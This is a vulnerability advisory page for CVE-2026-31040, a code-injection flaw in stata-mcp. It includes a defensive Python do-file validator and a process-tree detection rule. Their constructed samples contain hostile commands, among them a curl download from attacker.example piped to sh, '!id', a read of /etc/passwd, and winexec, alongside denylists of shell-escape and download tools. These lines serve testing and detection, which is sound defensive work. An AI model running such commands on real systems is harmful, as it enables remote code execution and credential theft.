Cyber Posture

CVE-2026-31040

Severity: Critical
Published: 08 April 2026
Modified: 14 April 2026
KEV Added: (none recorded)
Patch: available (v1.13.0 or later; see Security Summary)
CVSS Score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
EPSS Score: 0.0012 (31.1st percentile)
Risk Priority: 20 (weighted 60% EPSS, 20% KEV, 20% CVSS)

Description

A vulnerability was identified in stata-mcp prior to v1.13.0 where insufficient validation of user-supplied Stata do-file content can lead to command execution.

Mitigating Controls (NIST 800-53 r5) (AI-generated)

Prevent: Directly requires validation of user-supplied inputs such as Stata do-file content to prevent code injection and arbitrary command execution.

Prevent: Mandates identification, reporting, and correction of flaws like insufficient do-file validation by patching to v1.13.0 or later.

Detect: Monitors systems for attacks and indicators of potential attacks, including anomalous command execution from do-file exploitation.
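To make the input-validation control concrete, here is an added example written for this page. It is not code from the stata-mcp project and not its actual fix (the advisory does not say how v1.13.0 validates do-file content). It assumes the server receives do-file text from an MCP client and passes it to Stata, and it refuses content whose commands hand control to the operating system or another interpreter: Stata's `shell` and its `!` abbreviation, `winexec`, `unix`, `xshell`, and `python`/`java` blocks. Comments and prefix commands such as `quietly` or `capture` are stripped first, `#delimit ;` mode is honoured, and a command whose name comes from a macro is refused too, because `local c shell` followed by `` `c' ... `` would otherwise slip past a name check. The sample do-file is constructed.

```python
import re

# Stata commands that hand control to the OS shell or another interpreter.
SHELL_ESCAPES = {"shell", "winexec", "unix", "xshell", "python", "java"}
# Prefix commands that may precede the real command on the same line.
PREFIXES = {"quietly", "qui", "noisily", "noi", "capture", "cap"}


def strip_comments(src: str) -> str:
    """Blank out Stata comments while keeping line numbers stable.

    /* ... */ may span lines; // (preceded by a blank) and /// run to end of
    line; a line whose first non-blank character is * is a comment.
    """
    src = re.sub(r"/\*.*?\*/", lambda m: re.sub(r"[^\n]", " ", m.group(0)),
                 src, flags=re.S)
    out = []
    for line in src.splitlines():
        line = re.sub(r"(?:^|\s)//.*$", "", line)
        out.append("" if line.lstrip().startswith("*") else line)
    return "\n".join(out)


def find_shell_escapes(do_text: str) -> list[tuple[int, str, str]]:
    """Return (line, token, reason) for every command that could reach the OS."""
    findings = []
    semicolon_mode = False          # toggled by `#delimit ;` / `#delimit cr`
    for lineno, raw in enumerate(strip_comments(do_text).splitlines(), 1):
        stmts = raw.split(";") if semicolon_mode else [raw]
        for stmt in stmts:
            tokens = stmt.split()
            if not tokens:
                continue
            if tokens[0].lower() == "#delimit":
                semicolon_mode = len(tokens) > 1 and tokens[1] == ";"
                continue
            # Peel off prefixes such as `capture noisily:`.
            while tokens and tokens[0].lower().rstrip(":") in PREFIXES:
                tokens.pop(0)
            if not tokens:
                continue
            head = tokens[0].lower().rstrip(":")
            if head.startswith("!"):                 # `!cmd` is `shell cmd`
                findings.append((lineno, "!", "shell-escape"))
            elif head[0] in "`$":                    # command name from a macro
                findings.append((lineno, tokens[0], "macro-indirection"))
            elif head in SHELL_ESCAPES:
                findings.append((lineno, head, "shell-escape"))
    return findings


def is_safe_to_run(do_text: str) -> bool:
    """Gate applied before the text is written to a .do file and handed to
    Stata; anything the check flags is refused outright."""
    return not find_shell_escapes(do_text)


# Constructed sample: a benign analysis with injected escapes of each kind.
SAMPLE_DO = """\
* constructed sample, not a real client request
sysuse auto, clear
summarize price mpg
capture noisily shell curl http://attacker.example/x | sh
!id
local c shell
`c' cat /etc/passwd
/* a commented-out shell call
   shell not-really */
#delimit ;
display "hello"; winexec calc.exe;
"""

if __name__ == "__main__":
    for line, token, reason in find_shell_escapes(SAMPLE_DO):
        print(f"line {line}: {token!r} ({reason})")
    print("safe to run:", is_safe_to_run(SAMPLE_DO))
```

A denylist like this is defence in depth, not the primary control: Stata has other routes to the file system and network (`copy` from a URL, `net install`, `file write`, `erase`), so untrusted do-files should also run under an unprivileged account with no network egress and a read-only view of anything the server cares about.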

Security Summary (AI-generated)

CVE-2026-31040 is a critical vulnerability in the stata-mcp software prior to version 1.13.0, stemming from insufficient validation of user-supplied Stata do-file content that enables command execution. Published on 2026-04-08, it carries a CVSS v3.1 base score of 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) and maps to CWE-94 (Code Injection).

Unauthenticated remote attackers can exploit this vulnerability over the network with low attack complexity and no user interaction required. Successful exploitation grants high-impact confidentiality, integrity, and availability compromises, including arbitrary command execution on affected systems.

Mitigation is available via the stata-mcp GitHub repository, where version 1.13.0 incorporates the fix through commit 52413ce and pull request 21, as detailed in issue 20. Security practitioners should prioritize updating to v1.13.0 or later to address the vulnerability.

Details

CWE(s)

CWE-94: Improper Control of Generation of Code ('Code Injection')

Affected Products

statamcp / stata-mcp, versions < 1.13.0 (fixed in 1.13.0)

AI Security Analysis (AI-generated)

AI Category: AI Agent Protocols and Integrations
Risk Domain: Protocol-Specific Risks
OWASP Top 10 for LLMs 2025: None mapped
MITRE ATLAS Techniques: None mapped
Classification Reason: Matched keywords: mcp

MITRE ATT&CK Enterprise Techniques (AI-generated)

T1190 Exploit Public-Facing Application Initial Access
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
T1059 Command and Scripting Interpreter Execution
Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries.
Why these techniques?

Unauthenticated remote code injection vulnerability in public-facing software (stata-mcp) enables exploitation of public-facing applications (T1190) leading to arbitrary command execution (T1059).

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0
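For the T1059 stage, here is an added example of a detection rule, not from this page or the stata-mcp project. It assumes process-creation telemetry (from an EDR agent or auditd, for instance) reduced to pid, ppid, executable path and command line, and that a stata-mcp deployment never legitimately needs Stata to spawn child processes: a `shell` or `!` escape in a do-file produces a shell under the Stata process, and whatever the attacker asked for runs beneath that shell. The sample events are constructed and the executable names are assumptions.

```python
from dataclasses import dataclass

# Stata binaries as they appear in process telemetry (assumed names).
STATA_IMAGES = {"stata", "stata-mp", "stata-se", "xstata"}
# Shells and download tools whose presence below Stata marks an escape.
SHELLS_AND_TOOLS = {"sh", "bash", "dash", "zsh", "curl", "wget", "python3", "nc"}


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    exe: str          # full path to the executable
    cmdline: str


def basename(path: str) -> str:
    return path.rsplit("/", 1)[-1]


def ancestors(pid: int, by_pid: dict[int, ProcEvent]) -> list[ProcEvent]:
    """Walk ppid links upward, nearest parent first; stop at an unknown
    parent or a cycle."""
    chain, seen = [], {pid}
    cur = by_pid.get(pid)
    while cur and cur.ppid in by_pid and cur.ppid not in seen:
        seen.add(cur.ppid)
        cur = by_pid[cur.ppid]
        chain.append(cur)
    return chain


def detect_stata_shell_escape(events: list[ProcEvent]) -> list[tuple[int, str, str]]:
    """Return (pid, exe, reason) for suspicious processes descended from Stata.

    Rule 1: any direct child of Stata is reported, since an analysis server
    has no reason to let Stata spawn anything. Rule 2: a shell or download
    tool anywhere below Stata is reported even when an intermediate process
    sits between it and Stata.
    """
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        chain = ancestors(e.pid, by_pid)
        if not any(basename(a.exe) in STATA_IMAGES for a in chain):
            continue
        if basename(chain[0].exe) in STATA_IMAGES:
            alerts.append((e.pid, e.exe, "direct child of Stata"))
        elif basename(e.exe) in SHELLS_AND_TOOLS:
            alerts.append((e.pid, e.exe, "shell/download tool under Stata"))
    return alerts


# Constructed telemetry: the MCP server (assumed to be Python) launches Stata
# in batch mode; the injected `shell` line spawns sh, which fetches and runs
# a payload. An unrelated SSH session provides benign shell activity.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "/usr/bin/python3", "python3 -m stata_mcp"),
    ProcEvent(200, 100, "/usr/local/stata/stata-mp", "stata-mp -b do job.do"),
    ProcEvent(300, 200, "/bin/sh", "sh -c 'curl http://attacker.example/x | sh'"),
    ProcEvent(301, 300, "/usr/bin/curl", "curl http://attacker.example/x"),
    ProcEvent(302, 300, "/bin/sh", "sh"),
    ProcEvent(400, 1, "/usr/sbin/sshd", "sshd: ops"),
    ProcEvent(401, 400, "/bin/bash", "bash"),
]

if __name__ == "__main__":
    for pid, exe, reason in detect_stata_shell_escape(SAMPLE_EVENTS):
        print(f"pid {pid} {exe}: {reason}")
```

Rule 1 is the one that fires first in practice and is the cheapest to tune: the only expected child of a Stata batch process in this deployment is none, so a direct-child alert needs no allowlist. Rule 2 catches the payload when telemetry has lost the intermediate link or when the first child is something not on the tool list.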
